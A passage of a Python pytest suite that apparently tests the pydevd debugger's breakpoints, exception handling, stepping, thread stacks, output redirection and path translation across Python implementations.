writer.log.append('asserted')
writer.finished_ok = True
def test_module_entry_point(case_setup_m_switch_entry_point):
with case_setup_m_switch_entry_point.test_file() as writer:
writer.log.append('writing add breakpoint')
breakpoint_id = writer.write_add_breakpoint(1, None)
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_check_tracer_with_exceptions(case_setup):
def get_environ(writer):
env = os.environ.copy()
# This test requires regular tracing (without cython).
env['PYDEVD_USE_CYTHON'] = 'NO'
env['PYDEVD_USE_FRAME_EVAL'] = 'NO'
return env
with case_setup.test_file('_debugger_case_check_tracer.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy('IndexError', "1", "1", "1")
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_basic(case_setup):
def check_test_suceeded_msg(writer, stdout, stderr):
# Don't call super (we have an unhandled exception in the stack trace).
return 'TEST SUCEEDED' in ''.join(stdout) and 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise Exception' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'_debugger_case_unhandled_exceptions.py',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
EXPECTED_RETURNCODE=1,
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
def check(hit, exc_type, exc_desc):
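            # Ask the stopped thread for its current exception, check the reported type,
            # description and frame file, and then resume it.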
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:exc_type in msg and 'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
assert unquote(msg.thread['exc_desc']) == exc_desc
assert unquote(msg.thread['exc_type']) in (
"<type 'exceptions.%s'>" % (exc_type,), # py2
"<class '%s'>" % (exc_type,) # py3
)
if len(msg.thread.frame) == 0:
assert unquote(unquote(msg.thread.frame['file'])).endswith('_debugger_case_unhandled_exceptions.py')
else:
assert unquote(unquote(msg.thread.frame[0]['file'])).endswith('_debugger_case_unhandled_exceptions.py')
writer.write_run_thread(hit.thread_id)
# Will stop in 2 background threads
hit0 = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
thread_id1 = hit0.thread_id
hit1 = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
thread_id2 = hit1.thread_id
if hit0.name == 'thread_func2':
check(hit0, 'ValueError', 'in thread 2')
check(hit1, 'Exception', 'in thread 1')
else:
check(hit0, 'Exception', 'in thread 1')
check(hit1, 'ValueError', 'in thread 2')
writer.write_run_thread(thread_id1)
writer.write_run_thread(thread_id2)
# Will stop in main thread
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
assert hit.name == '<module>'
thread_id3 = hit.thread_id
# Requesting the stack in an unhandled exception should provide the stack of the exception,
# not the current location of the program.
writer.write_get_thread_stack(thread_id3)
msg = writer.wait_for_message(CMD_GET_THREAD_STACK)
assert len(msg.thread.frame) == 0 # In main thread (must have no back frames).
assert msg.thread.frame['name'] == '<module>'
check(hit, 'IndexError', 'in main')
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_in_top_level1(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
EXPECTED_RETURNCODE=1,
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
# Will stop in main thread
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_in_top_level2(case_setup_unhandled_exceptions):
# Note: expecting unhandled exception to be printed to stderr.
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
pydevd_dirname = os.path.dirname(writer.get_pydevd_file())
curr_pythonpath = pydevd_dirname + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
return env
def update_command_line_args(writer, args):
        # Start pydevd with '-m' to see how it deals with being called through
        # runpy at the start.
assert args[0].endswith('pydevd.py')
args = ['-m', 'pydevd'] + args[1:]
return args
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
get_environ=get_environ,
update_command_line_args=update_command_line_args,
EXPECTED_RETURNCODE='any',
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
# Should stop (only once) in the main thread.
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_in_top_level3(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
EXPECTED_RETURNCODE=1
) as writer:
# Handled and unhandled
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "1", "0")
writer.write_make_initial_run()
        # Will stop in the main thread twice: once when we find that the exception is being
        # thrown and again in post-mortem mode when we discover it's uncaught.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_in_top_level4(case_setup_unhandled_exceptions):
# Note: expecting unhandled exception to be printed to stderr.
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level2.py',
EXPECTED_RETURNCODE=1,
) as writer:
# Handled and unhandled
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "1", "0")
writer.write_make_initial_run()
# We have an exception thrown and handled and another which is thrown and is then unhandled.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='Only for Python.')
def test_case_set_next_statement(case_setup):
with case_setup.test_file('_debugger_case_set_next_statement.py') as writer:
breakpoint_id = writer.write_add_breakpoint(6, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=6) # Stop in line a=3 (before setting it)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 2"'.format(builtin_qualifier))
writer.write_set_next_statement(hit.thread_id, 2, 'method')
hit = writer.wait_for_breakpoint_hit('127', line=2)
# Check that it's still unchanged
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 2"'.format(builtin_qualifier))
        # After a step over it should become 1, as we executed the line which sets a = 1
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108')
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 1"'.format(builtin_qualifier))
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_unhandled_exceptions_get_stack(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exception_get_stack.py',
EXPECTED_RETURNCODE='any',
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_get_thread_stack(hit.thread_id)
msg = writer.wait_for_get_thread_stack_message()
files = [frame['file'] for frame in msg.thread.frame]
assert msg.thread['id'] == hit.thread_id
if not files[0].endswith('_debugger_case_unhandled_exception_get_stack.py'):
raise AssertionError('Expected to find _debugger_case_unhandled_exception_get_stack.py in files[0]. Found: %s' % ('\n'.join(files),))
assert len(msg.thread.frame) == 0 # No back frames (stopped in main).
assert msg.thread.frame['name'] == '<module>'
assert msg.thread.frame['line'] == str(writer.get_line_index_with_content('break line on unhandled exception'))
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='Only for Python.')
def test_case_get_next_statement_targets(case_setup):
with case_setup.test_file('_debugger_case_get_next_statement_targets.py') as writer:
breakpoint_id = writer.write_add_breakpoint(21, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=21)
writer.write_get_next_statement_targets(hit.thread_id, hit.frame_id)
targets = writer.wait_for_get_next_statement_targets()
expected = set((2, 3, 5, 8, 9, 10, 12, 13, 14, 15, 17, 18, 19, 21))
assert targets == expected, 'Expected targets to be %s, was: %s' % (expected, targets)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON or IS_JYTHON, reason='Failing on IronPython and Jython (needs to be investigated).')
def test_case_type_ext(case_setup):
# Custom type presentation extensions
def get_environ(self):
env = os.environ.copy()
python_path = env.get("PYTHONPATH", "")
ext_base = debugger_unittest._get_debugger_test_file('my_extensions')
env['PYTHONPATH'] = ext_base + os.pathsep + python_path if python_path else ext_base
return env
with case_setup.test_file('_debugger_case_type_ext.py', get_environ=get_environ) as writer:
writer.get_environ = get_environ
writer.write_add_breakpoint(7, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
assert writer.wait_for_var([
[
r'<var name="my_rect" type="Rect" qualifier="__main__" value="Rectangle%255BLength%253A 5%252C Width%253A 10 %252C Area%253A 50%255D" isContainer="True" />',
r'<var name="my_rect" type="Rect" value="Rect: <__main__.Rect object at', # Jython
]
])
writer.write_get_variable(hit.thread_id, hit.frame_id, 'my_rect')
assert writer.wait_for_var(r'<var name="area" type="int" qualifier="{0}" value="int%253A 50" />'.format(builtin_qualifier))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON or IS_JYTHON, reason='Failing on IronPython and Jython (needs to be investigated).')
def test_case_event_ext(case_setup):
def get_environ(self):
env = os.environ.copy()
python_path = env.get("PYTHONPATH", "")
ext_base = debugger_unittest._get_debugger_test_file('my_extensions')
env['PYTHONPATH'] = ext_base + os.pathsep + python_path if python_path else ext_base
env["VERIFY_EVENT_TEST"] = "1"
return env
# Test initialize event for extensions
with case_setup.test_file('_debugger_case_event_ext.py', get_environ=get_environ) as writer:
original_additional_output_checks = writer.additional_output_checks
@overrides(writer.additional_output_checks)
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if 'INITIALIZE EVENT RECEIVED' not in stdout:
raise AssertionError('No initialize event received')
writer.additional_output_checks = additional_output_checks
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Jython does not seem to be creating thread started inside tracing (investigate).')
def test_case_writer_creation_deadlock(case_setup):
    # Check the case where there was a deadlock when evaluating expressions.
with case_setup.test_file('_debugger_case_thread_creation_deadlock.py') as writer:
writer.write_add_breakpoint(26, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
assert hit.line == 26, 'Expected return to be in line 26, was: %s' % (hit.line,)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'create_thread()')
writer.wait_for_evaluation('<var name="create_thread()" type="str" qualifier="{0}" value="str: create_thread:ok'.format(builtin_qualifier))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_skip_breakpoints_in_exceptions(case_setup):
# Case where breakpoint is skipped after an exception is raised over it
with case_setup.test_file('_debugger_case_skip_breakpoint_in_exceptions.py') as writer:
writer.write_add_breakpoint(5, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111', line=5)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('111', line=5)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_handled_exceptions0(case_setup):
# Stop only once per handled exception.
with case_setup.test_file('_debugger_case_exceptions.py') as writer:
writer.write_set_project_roots([os.path.dirname(writer.TEST_FILE)])
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION,
line=writer.get_line_index_with_content('raise indexerror line')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working on Jython (needs to be investigated).')
def test_case_handled_exceptions1(case_setup):
# Stop multiple times for the same handled exception.
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
def check(hit):
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_message(accept_message=lambda msg:'__exception__' in msg and 'IndexError' in msg, unquote_msg=False)
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:'IndexError' in msg and 'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
assert msg.thread['exc_desc'] == 'foo'
assert unquote(msg.thread['exc_type']) in (
"<type 'exceptions.IndexError'>", # py2
"<class 'IndexError'>" # py3
)
assert unquote(unquote(msg.thread.frame[0]['file'])).endswith('_debugger_case_exceptions.py')
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('raise indexerror line'))
check(hit)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('reraise on method2'))
check(hit)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('handle on method1'))
check(hit)
writer.finished_ok = True
def test_case_handled_exceptions2(case_setup):
# No IDE_PROJECT_ROOTS set.
def get_environ(self):
env = os.environ.copy()
# Don't stop anywhere (note: having IDE_PROJECT_ROOTS = '' will consider
# having anything not under site-packages as being in the project).
env["IDE_PROJECT_ROOTS"] = '["empty"]'
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
writer.finished_ok = True
def test_case_handled_exceptions3(case_setup):
    # Stop on the exception at the line where it's raised (skip_on_exceptions_thrown_in_same_context=False).
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
# Note: in this mode we'll only stop once.
writer.write_set_py_exception_globals(
break_on_uncaught=False,
break_on_caught=True,
skip_on_exceptions_thrown_in_same_context=False,
ignore_exceptions_thrown_in_lines_with_ignore_exception=True,
ignore_libraries=True,
exceptions=('IndexError',)
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('raise indexerror line'))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_handled_exceptions4(case_setup):
# Don't stop on exception thrown in the same context (only at caller).
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
# Note: in this mode we'll only stop once.
writer.write_set_py_exception_globals(
break_on_uncaught=False,
break_on_caught=True,
skip_on_exceptions_thrown_in_same_context=True,
ignore_exceptions_thrown_in_lines_with_ignore_exception=True,
ignore_libraries=True,
exceptions=('IndexError',)
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('reraise on method2'))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_settrace(case_setup):
with case_setup.test_file('_debugger_case_settrace.py') as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(line=7)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(True or IS_PY26 or IS_JYTHON, reason='This is *very* flaky. Scapy only supports 2.7 onwards, not available for jython.')
def test_case_scapy(case_setup):
with case_setup.test_file('_debugger_case_scapy.py') as writer:
writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
writer.reader_thread.set_messages_timeout(30) # Starting scapy may be slow (timed out with 15 seconds on appveyor).
writer.write_add_breakpoint(2, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_APPVEYOR or IS_JYTHON, reason='Flaky on appveyor / Jython encoding issues (needs investigation).')
def test_redirect_output(case_setup):
def get_environ(writer):
env = os.environ.copy()
env["PYTHONIOENCODING"] = 'utf-8'
return env
with case_setup.test_file('_debugger_case_redirect.py', get_environ=get_environ) as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
@overrides(writer._ignore_stderr_line)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
return line.startswith((
'text',
'binary',
'a'
))
writer._ignore_stderr_line = _ignore_stderr_line
# Note: writes to stdout and stderr are now synchronous (so, the order
# must always be consistent and there's a message for each write).
expected = [
'text\n',
'binary or text\n',
'ação1\n',
]
if sys.version_info[0] >= 3:
expected.extend((
'binary\n',
'ação2\n'.encode(encoding='latin1').decode('utf-8', 'replace'),
'ação3\n',
))
new_expected = [(x, 'stdout') for x in expected]
new_expected.extend([(x, 'stderr') for x in expected])
writer.write_start_redirect()
writer.write_make_initial_run()
msgs = []
ignored = []
while len(msgs) < len(new_expected):
try:
msg = writer.wait_for_output()
except AssertionError:
for msg in msgs:
sys.stderr.write('Found: %s\n' % (msg,))
for msg in new_expected:
sys.stderr.write('Expected: %s\n' % (msg,))
for msg in ignored:
sys.stderr.write('Ignored: %s\n' % (msg,))
raise
if msg not in new_expected:
ignored.append(msg)
continue
msgs.append(msg)
if msgs != new_expected:
print(msgs)
print(new_expected)
assert msgs == new_expected
writer.finished_ok = True
def _path_equals(path1, path2):
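    # Compare two paths after normalizing their case with pydevd's own normcase
    # (needed for the mixed-case variant on Windows).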
path1 = pydevd_file_utils.normcase(path1)
path2 = pydevd_file_utils.normcase(path2)
return path1 == path2
@pytest.mark.parametrize('mixed_case', [True, False] if sys.platform == 'win32' else [False])
def test_path_translation(case_setup, mixed_case):
def get_file_in_client(writer):
        # Instead of using: tests_python/_debugger_case_path_translation.py
        # we'll set the breakpoints at foo/_debugger_case_path_translation.py
file_in_client = os.path.dirname(os.path.dirname(writer.TEST_FILE))
return os.path.join(os.path.dirname(file_in_client), 'foo', '_debugger_case_path_translation.py')
def get_environ(writer):
import json
env = os.environ.copy()
env["PYTHONIOENCODING"] = 'utf-8'
assert writer.TEST_FILE.endswith('_debugger_case_path_translation.py')
file_in_client = get_file_in_client(writer)
if mixed_case:
new_file_in_client = ''.join([file_in_client[i].upper() if i % 2 == 0 else file_in_client[i].lower() for i in range(len(file_in_client))])
assert _path_equals(file_in_client, new_file_in_client)
env["PATHS_FROM_ECLIPSE_TO_PYTHON"] = json.dumps([
(
os.path.dirname(file_in_client),
os.path.dirname(writer.TEST_FILE)
)
])
return env
with case_setup.test_file('_debugger_case_path_translation.py', get_environ=get_environ) as writer:
from tests_python.debugger_unittest import CMD_LOAD_SOURCE
writer.write_start_redirect()
file_in_client = get_file_in_client(writer)
assert 'tests_python' not in file_in_client
writer.write_add_breakpoint(
writer.get_line_index_with_content('break here'), 'call_this', filename=file_in_client)
writer.write_make_initial_run()
xml = writer.wait_for_message(lambda msg:'stop_reason="111"' in msg)
assert xml.thread.frame[0]['file'] == file_in_client
thread_id = xml.thread['id']
# Request a file that exists
files_to_match = [file_in_client]
if IS_WINDOWS:
files_to_match.append(file_in_client.upper())
for f in files_to_match:
writer.write_load_source(f)
writer.wait_for_message(
lambda msg:
'%s\t' % CMD_LOAD_SOURCE in msg and \
"def main():" in msg and \
"print('break here')" in msg and \
"print('TEST SUCEEDED!')" in msg
, expect_xml=False)
# Request a file that does not exist
writer.write_load_source(file_in_client + 'not_existent.py')
writer.wait_for_message(
lambda msg:'901\t' in msg and ('FileNotFoundError' in msg or 'IOError' in msg),
expect_xml=False)
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_evaluate_errors(case_setup):
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_evaluate_expression('%s\t%s\t%s' % (thread_id, frame_id, 'LOCAL'), 'name_error')
writer.wait_for_evaluation('<var name="name_error" type="NameError"')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_list_threads(case_setup):
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
seq = writer.write_list_threads()
msg = writer.wait_for_list_threads(seq)
assert msg.thread['name'] == 'MainThread'
assert msg.thread['id'].startswith('pid')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_print(case_setup):
with case_setup.test_file('_debugger_case_print.py') as writer:
writer.write_add_breakpoint(1, 'None')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working on Jython (needs to be investigated).')
def test_case_lamdda(case_setup):
with case_setup.test_file('_debugger_case_lamda.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'None')
writer.write_make_initial_run()
for _ in range(3): # We'll hit the same breakpoint 3 times.
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working properly on Jython (needs investigation).')
def test_case_suspension_policy(case_setup):
with case_setup.test_file('_debugger_case_suspend_policy.py') as writer:
writer.write_add_breakpoint(25, '', suspend_policy='ALL')
writer.write_make_initial_run()
thread_ids = []
for i in range(3):
writer.log.append('Waiting for thread %s of 3 to stop' % (i + 1,))
            # One thread is suspended with a breakpoint hit and the other 2 are reported as thread-suspended.
hit = writer.wait_for_breakpoint_hit((REASON_STOP_ON_BREAKPOINT, REASON_THREAD_SUSPEND))
thread_ids.append(hit.thread_id)
for thread_id in thread_ids:
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Flaky on Jython (needs investigation).')
def test_case_get_thread_stack(case_setup):
with case_setup.test_file('_debugger_case_get_thread_stack.py') as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
@overrides(writer._ignore_stderr_line)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
if IS_JYTHON:
for expected in (
"RuntimeWarning: Parent module '_pydev_bundle' not found while handling absolute import",
"from java.lang import System"):
if expected in line:
return True
return False
writer._ignore_stderr_line = _ignore_stderr_line
writer.write_add_breakpoint(18, None)
writer.write_make_initial_run()
thread_created_msgs = [writer.wait_for_message(CMD_THREAD_CREATE)]
thread_created_msgs.append(writer.wait_for_message(CMD_THREAD_CREATE))
thread_id_to_name = {}
for msg in thread_created_msgs:
thread_id_to_name[msg.thread['id']] = msg.thread['name']
assert len(thread_id_to_name) == 2
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
assert hit.thread_id in thread_id_to_name
for request_thread_id in thread_id_to_name:
writer.write_get_thread_stack(request_thread_id)
msg = writer.wait_for_get_thread_stack_message()
files = [frame['file'] for frame in msg.thread.frame]
assert msg.thread['id'] == request_thread_id
if not files[0].endswith('_debugger_case_get_thread_stack.py'):
raise AssertionError('Expected to find _debugger_case_get_thread_stack.py in files[0]. Found: %s' % ('\n'.join(files),))
if ([filename for filename in files if filename.endswith('pydevd.py')]):
raise AssertionError('Did not expect to find pydevd.py. Found: %s' % ('\n'.join(files),))
if request_thread_id == hit.thread_id:
assert len(msg.thread.frame) == 0 # In main thread (must have no back frames).
assert msg.thread.frame['name'] == '<module>'
else:
assert len(msg.thread.frame) > 1 # Stopped in threading (must have back frames).
assert msg.thread.frame[0]['name'] == 'method'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_dump_threads_to_stderr(case_setup):
from tests_python.debugger_unittest import wait_for_condition
def additional_output_checks(writer, stdout, stderr):
assert is_stderr_ok(stderr), make_error_msg(stderr)
def make_error_msg(stderr):
return 'Did not find thread dump in stderr. stderr:\n%s' % (stderr,)
def is_stderr_ok(stderr):
return 'Thread Dump' in stderr and 'Thread pydevd.CommandThread (daemon: True, pydevd thread: True)' in stderr
with case_setup.test_file(
'_debugger_case_get_thread_stack.py', additional_output_checks=additional_output_checks) as writer:
writer.write_add_breakpoint(12, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
writer.write_dump_threads()
wait_for_condition(
lambda: is_stderr_ok(writer.get_stderr()),
lambda: make_error_msg(writer.get_stderr())
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_regular(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO_MY_CODE, file='_debugger_case_simple_calls.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def _get_breakpoint_cases():
if sys.version_info >= (3, 7):
# Just check breakpoint()
return ('_debugger_case_breakpoint.py',)
else:
# Check breakpoint() and sys.__breakpointhook__ replacement.
return ('_debugger_case_breakpoint.py', '_debugger_case_breakpoint2.py')
@pytest.mark.parametrize("filename", _get_breakpoint_cases())
def test_py_37_breakpoint(case_setup, filename):
with case_setup.test_file(filename) as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(file=filename, line=3)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def _get_generator_cases():
if IS_PY2:
return ('_debugger_case_generator_py2.py',)
else:
# On py3 we should check both versions.
return (
'_debugger_case_generator_py2.py',
'_debugger_case_generator_py3.py',
)
@pytest.mark.parametrize("filename", _get_generator_cases())
def test_generator_cases(case_setup, filename):
with case_setup.test_file(filename) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_m_switch(case_setup_m_switch):
with case_setup_m_switch.test_file() as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO_MY_CODE, file='_debugger_case_m_switch.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_entry_point(case_setup_m_switch_entry_point):
with case_setup_m_switch_entry_point.test_file() as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO_MY_CODE, file='_debugger_case_module_entry_point.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working properly on Jython (needs investigation).')
def test_debug_zip_files(case_setup, tmpdir):
def get_environ(writer):
env = os.environ.copy()
